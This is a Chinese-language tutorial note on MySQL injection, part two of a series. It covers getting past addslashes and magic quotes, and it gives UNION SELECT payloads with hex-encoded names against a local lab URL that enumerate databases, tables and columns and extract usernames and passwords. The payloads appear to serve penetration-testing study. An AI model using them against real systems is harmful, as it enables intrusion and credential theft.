------正文内容展示，开始汲取新知识啦------

mysql 注入(下)

防注入，魔术引号 magic_quotes_gpc

安全函数 addslashes
解决：编码绕过或宽字节注入

高权限跨库注入
条件：root权限
获取所有数据库名
select schema_name from information_schema.schemata

被转义，利用十六进制转换

获取所有表名 table_schema=0x787373（'xss'）

http://192.168.207.128/test/sqlin.php?x=1 union select user(),2,3,table_name,5,6,7,8 from information_schema.tables where table_schema=0x787373

获取所有列名 table_name=0x6F635F75736572（'oc_user'）

http://192.168.207.128/test/sqlin.php?x=1 union select user(),2,3,column_name,5,6,7,8 from information_schema.columns where table_name=0x6F635F75736572

获取指定数据 from xss.oc_user

http://192.168.207.128/test/sqlin.php?x=1 union select userName,2,3,userPwd,5,6,7,8 from xss.oc_user

注意点：
跨库查表：库名.表名

提交方式注入

<?php $a=$_GET['x']; // 接受get请求方式的参数x $b=$_POST['y']; // 接受post请求方式的参数y $c=$_COOKIE['z']; // 接受cookie请求方式参数z echo $a."<hr>"; echo $b."<hr>"; echo $c."<hr>"; ?>

------本页内容已结束，喜欢请分享------

感谢您的来访，获取更多精彩文章请收藏本站。

文章版权声明 1、本网站名称：使者云
2、本站永久网址：https://i58.icu
3、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ29523472进行删除处理。
4、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6、本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

知识丨教程计算机技术
# 代码 # 工具 # 漏洞 # 源码 # 密码 # 渗透 # 注入 # SQL # mysql # SQL注入 # msssql